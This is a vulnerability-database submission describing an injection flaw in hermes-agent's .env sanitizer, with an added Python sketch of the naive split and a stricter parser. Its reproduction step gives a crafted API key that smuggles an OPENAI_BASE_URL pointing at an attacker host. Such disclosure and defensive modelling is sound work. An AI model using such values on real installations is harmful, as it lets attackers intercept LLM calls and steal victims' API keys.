Submit #822020: NousResearch hermes-agent <= v2026.4.30 Injection (CWE-74)

Title: NousResearch hermes-agent <= v2026.4.30 Injection (CWE-74)

Description:

# Technical Details

An Environment Variable Semantic Injection exists in the `_sanitize_env_lines` method in `hermes_cli/config.py` of hermes-agent. The application fails to verify boundaries when parsing `.env` lines, using naive `str.find()` to locate key names anywhere within the line.

# Vulnerable Code

File: hermes_cli/config.py
Method: _sanitize_env_lines
Why: `str.find()` is used without boundary checks, so a known key name embedded inside a credential value causes the line to be split, injecting a new configuration variable.

# Reproduction

1. Craft a malicious API key containing an embedded payload (e.g., `sk-AAAA1234OPENAI_BASE_URL=http://evil.attacker.com/v1`).
2. Save the key via normal Hermes CLI flow (e.g., `hermes setup`).
3. On the next startup, the injected variable (e.g., `OPENAI_BASE_URL`) is picked up and routes API calls to the attacker's proxy.

# Impact

- LLM API call interception via a full man-in-the-middle attack.
- Credential theft by receiving the victim's real API keys in the Authorization header.
Source: ⚠️ https://gist.github.com/YLChen-007/7ee2eeaa383b3540d2e8854250c03fb0
User: Eric-j (UID 98073)
Submission: 07/05/2026 03:38 PM (28 days ago)
Moderation: 31/05/2026 09:51 AM (24 days later)
Status: Accepted
VulDB entry: 367501 [NousResearch hermes-agent up to 2026.4.30 hermes_cli/config.py _sanitize_env_lines privilege escalation]
Points: 20
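
A simplified model of the boundary bug the description reports, next to a parser that respects line boundaries and a save-time check on credential values. This is an added example, not code from hermes-agent: `KNOWN_KEYS`, the function names and the sample value are assumptions, since the page does not show the body of `_sanitize_env_lines`.

```python
import re

# Assumed subset of keys the sanitizer knows; the real list is not on the page.
KNOWN_KEYS = ("OPENAI_API_KEY", "OPENAI_BASE_URL")
KEY_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def split_naive(line):
    """Model of the flaw: cut wherever a known 'KEY=' is found in the line."""
    cuts = {0}
    for key in KNOWN_KEYS:
        pos = line.find(key + "=")  # no check that pos is a line boundary
        if pos > 0:
            cuts.add(pos)
    cuts = sorted(cuts)
    return [line[a:b] for a, b in zip(cuts, cuts[1:] + [len(line)])]


def parse_strict(line):
    """One physical line is one assignment; the value is never re-scanned."""
    key, sep, value = line.partition("=")
    if not sep or not KEY_RE.match(key):
        raise ValueError(f"not a KEY=value line: {line!r}")
    return key, value


def value_embeds_key(value):
    """Save-time check: return the known key a credential value embeds, if any."""
    for key in KNOWN_KEYS:
        if key + "=" in value:
            return key
    return None


# Constructed input in the shape of the report's reproduction string.
SAMPLE = "OPENAI_API_KEY=sk-AAAA1234OPENAI_BASE_URL=http://proxy.example.invalid/v1"

if __name__ == "__main__":
    print("naive :", split_naive(SAMPLE))
    key, value = parse_strict(SAMPLE)
    print("strict:", key, "->", value)
    print("embedded key:", value_embeds_key(value))
```

The naive splitter turns one stored credential into two assignments, while the strict parser keeps the whole string as the value of `OPENAI_API_KEY`; rejecting values flagged by `value_embeds_key` before they are written closes the same gap at input time.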
